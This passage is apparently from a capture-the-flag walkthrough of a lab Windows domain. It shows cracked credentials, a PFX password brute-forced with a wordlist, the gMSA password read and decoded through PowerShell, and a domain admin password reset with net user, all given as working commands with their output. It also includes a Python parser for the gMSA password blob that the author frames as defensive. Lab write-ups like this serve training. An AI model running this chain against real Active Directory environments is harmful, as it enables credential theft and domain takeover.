Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton

Now we have 14 more username and password pairs. Looking at the Bloodhound path to domain admin, only two of the users on it, Abby and Sierra, appear in the password list. Abby's password didn't work, but Sierra's did.

$> smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Enter WORKGROUP\Sierra.Frye's password: $$49=wide=STRAIGHT=jordan=28$$18

Try "help" to get a list of possible commands.
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> ls
  .                                 DRc        0  Thu Nov 18 01:08:00 2021
  ..                                DRc        0  Thu Nov 18 01:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 18:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 14:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 12:28:05 2020
  user.txt                           Ac       33  Thu Nov 18 00:55:27 2021

                3246079 blocks of size 4096. 459005 blocks available
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

We have user flag now.

smb: \sierra.frye\Downloads\Backups\> ls
  .                                 DHc        0  Mon Aug 10 20:39:17 2020
  ..                                DHc        0  Mon Aug 10 20:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 15:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 20:39:17 2020

                3246079 blocks of size 4096. 458996 blocks available

Under Downloads\Backups there are two certificate files; download both to your machine.
A .p12 file is a PKCS#12 (Public Key Cryptography Standards #12) archive: a password-protected container used as a portable format for moving a private key together with its certificate chain and other sensitive material. Many security and encryption programs consume it, and it is commonly referred to as a "PFX file".
We can try importing this certificate into the browser (Firefox). The import asks for the archive password, which we can try to crack with the tool below:
GitHub – Ridter/p12tool: A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.

$> ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt

Version: 1.0 (n/a) - 01/03/22 - Evi1cg
2022/01/03 02:34:13 -> [*] Brute forcing...
2022/01/03 02:34:13 -> [*] Start thread num 100
2022/01/03 03:01:44 -> [+] Password found ==> misspissy
2022/01/03 03:01:44 -> [*] Successfully cracked password after 5484391 attempts!

On a VM this takes considerably longer. Now we have the certificate password (misspissy); import the certificate into the browser. There is a specific endpoint that requires this client certificate:

https://search.htb/staff/

It then prompts for credentials; log in as 'Sierra' with '$$49=wide=STRAIGHT=jordan=28$$18' to reach the PowerShell console.

After login we can run PowerShell commands.
Back in Bloodhound, look for a path from the owned principals to domain admin. Sierra is a member of ITSEC, and that group can read a GMSA password: BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account, and the group ITSEC@SEARCH.HTB can retrieve the password for BIR-ADFS-GMSA@SEARCH.HTB.

$> python3 gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'

BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords, so the hash is not practical to crack. References:
PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings
Passwordless PowerShell
GMSA Attributes in the Active Directory

The GMSA attributes involved:
msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword): stores the security principals that can read the GMSA password.
msDS-ManagedPassword: contains a BLOB with the password information for the group managed service account.
msDS-ManagedPasswordId: a constructed attribute holding the key identifier for the current managed password data of the group MSA.
msDS-ManagedPasswordInterval: the number of days before the managed password of the group MSA is automatically changed.

Based on those two blogs, we can run commands as BIR-ADFS-GMSA and set up a path to domain admin:
$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
These lines read the GMSA password blob, decode it, and build a PSCredential so that commands can be run as the 'BIR-ADFS-GMSA$' user.
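The msDS-ManagedPassword attribute listed above is what ConvertFrom-ADManagedPasswordBlob decodes. As an added example, not from this write-up and not the DSInternals implementation, here is a stand-alone Python parser for that blob following the MSDS-MANAGEDPASSWORD_BLOB layout documented in MS-ADTS 2.2.20 (16-byte header of offsets, NUL-terminated UTF-16LE current and optional previous password, 8-byte alignment padding, then two 64-bit intervals in 100-nanosecond units). It comes with a builder that fabricates a structurally valid blob with constructed values so the parser can run offline; the interval field names in the returned dict are this example's own. Two details matter to a defender: the password is a run of random 16-bit code units, which is why the decoder needs surrogatepass and why cracking the resulting NTLM hash is hopeless, and the interval fields tell you how long the current value stays valid before the KDS-derived rotation.

```python
"""Parse the MSDS-MANAGEDPASSWORD_BLOB carried in msDS-ManagedPassword (MS-ADTS 2.2.20)."""
import struct
from typing import Optional

# Version, Reserved, Length, CurrentPasswordOffset, PreviousPasswordOffset,
# QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset (all little-endian).
HEADER = "<HHIHHHH"
HEADER_LEN = struct.calcsize(HEADER)   # 16 bytes
TICKS_PER_SECOND = 10_000_000          # the interval fields are in 100-ns units


def _read_utf16z(blob: bytes, offset: int) -> str:
    """Read a NUL-terminated UTF-16LE string starting at offset.
    gMSA passwords are random 16-bit units and may contain lone surrogates,
    so decode with surrogatepass instead of the strict default."""
    end = offset
    while blob[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(blob):
            raise ValueError("unterminated UTF-16 string in blob")
    return blob[offset:end].decode("utf-16-le", "surrogatepass")


def parse_managed_password_blob(blob: bytes) -> dict:
    """Decode the blob into its fields; raises ValueError on a malformed structure."""
    if len(blob) < HEADER_LEN:
        raise ValueError("blob shorter than header")
    version, _reserved, length, cur_off, prev_off, query_off, unchanged_off = struct.unpack_from(HEADER, blob, 0)
    if version != 1:
        raise ValueError(f"unexpected blob version {version}")
    if length != len(blob):
        raise ValueError("Length field does not match blob size")
    current = _read_utf16z(blob, cur_off)
    previous = _read_utf16z(blob, prev_off) if prev_off else None   # 0 means no previous password
    (query_ticks,) = struct.unpack_from("<Q", blob, query_off)
    (unchanged_ticks,) = struct.unpack_from("<Q", blob, unchanged_off)
    return {
        "current_password": current,
        "current_password_utf16_bytes": len(current.encode("utf-16-le", "surrogatepass")),
        "previous_password": previous,
        # QueryPasswordInterval: time after which the caller must re-query the password.
        "requery_after_seconds": query_ticks / TICKS_PER_SECOND,
        # UnchangedPasswordInterval: time during which queries are guaranteed to return this value.
        "unchanged_for_seconds": unchanged_ticks / TICKS_PER_SECOND,
    }


def build_managed_password_blob(current: str, previous: Optional[str],
                                requery_after_s: int, unchanged_for_s: int) -> bytes:
    """Build a structurally valid blob from constructed values (test input, not a real gMSA secret)."""
    cur = current.encode("utf-16-le", "surrogatepass") + b"\x00\x00"
    prev = (previous.encode("utf-16-le", "surrogatepass") + b"\x00\x00") if previous is not None else b""
    cur_off = HEADER_LEN
    prev_off = cur_off + len(cur) if previous is not None else 0
    body = cur + prev
    body += b"\x00" * ((-(HEADER_LEN + len(body))) % 8)   # AlignmentPadding for the 64-bit intervals
    query_off = HEADER_LEN + len(body)
    unchanged_off = query_off + 8
    length = unchanged_off + 8
    header = struct.pack(HEADER, 1, 0, length, cur_off, prev_off, query_off, unchanged_off)
    intervals = struct.pack("<QQ", requery_after_s * TICKS_PER_SECOND, unchanged_for_s * TICKS_PER_SECOND)
    return header + body + intervals


if __name__ == "__main__":
    sample = build_managed_password_blob("constructed-current", "constructed-previous", 2_000_000, 600_000)
    info = parse_managed_password_blob(sample)
    print({k: v for k, v in info.items() if k != "current_password"})
```

Reading this attribute is governed by msDS-GroupMSAMembership, so the audit question for a defender is who is listed there: on this box the answer is the whole ITSEC group, which is what turns one compromised member into the service account.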

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\Sierra.Frye\Documents> $user = 'BIR-ADFS-GMSA$'
PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $blob = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $mp = ConvertFrom-ADManagedPasswordBlob $blob
PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
search\bir-adfs-gmsa$
PS C:\Users\Sierra.Frye\Documents>

Everything is set; now we can use Invoke-Command with the credential to run any script or command as that account. Running whoami first confirms which user we are. The whole sequence:

$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

As the whoami result shows, we are now running as 'BIR-ADFS-GMSA$', not 'Sierra'.
Back in Bloodhound one more time, the help text for 'GenericAll' explains that it simply means full control over the 'Tristan' user, who is also a domain admin. Let's change the domain admin's password:

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}

Now we can access the admin directory to read the root flag.

$> smbclient //search.htb/C$ -U Tristan.Davies

Enter WORKGROUP\Tristan.Davies's password:
Try "help" to get a list of possible commands.
smb: \> ls
  $RECYCLE.BIN                     DHSc        0  Mon Mar 23 19:24:13 2020
  Config.Msi                       DHSc        0  Thu Dec 16 17:08:46 2021
  Documents and Settings          DHSrn        0  Sun Mar 22 23:46:47 2020
  HelpDesk                           Dc        0  Tue Apr 14 10:24:23 2020
  inetpub                            Dc        0  Mon Mar 23 07:20:20 2020
  pagefile.sys                      AHS 738197504  Mon Jan  3 07:18:09 2022
  PerfLogs                           Dc        0  Thu Jul 30 14:43:39 2020
  Program Files                     DRc        0  Thu Dec 16 17:07:44 2021
  Program Files (x86)                Dc        0  Sat Sep 15 07:21:46 2018
  ProgramData                      DHcn        0  Tue Apr 14 10:24:03 2020
  Recovery                        DHScn        0  Sun Mar 22 23:46:48 2020
  RedirectedFolders                  Dc        0  Mon Dec 20 08:10:02 2021
  System Volume Information         DHS        0  Tue Mar 31 14:13:38 2020
  Users                             DRc        0  Tue Aug 11 07:45:30 2020
  Windows                            Dc        0  Mon Jan  3 07:55:00 2022

                3246079 blocks of size 4096. 534471 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
